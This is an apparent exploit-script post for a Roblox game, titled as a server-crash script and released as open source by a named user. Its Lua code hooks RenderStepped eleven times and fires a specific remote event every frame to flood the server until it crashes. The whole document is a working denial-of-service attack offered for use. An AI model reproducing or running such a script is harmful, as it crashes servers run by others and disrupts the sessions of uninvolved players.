Pro Border Script | CRASH SERVER – OPEN SOURCE

Created by iiiSealGamerxxx

Features:

  • CRASH SERVER
  • OPEN SOURCE
  • DEV NOTES:
  • spawn and execute
-- made by iiiSealGamerxxx#0089
function authchar()
authargs = {
   [1] = "KuID"
}

game:GetService("ReplicatedStorage"):FindFirstChild("b7n7n7"):FireServer(unpack(authargs))
end

for i = 0, 10 do
   game.RunService.RenderStepped:Connect(function(step)
       authchar()
   end)
   end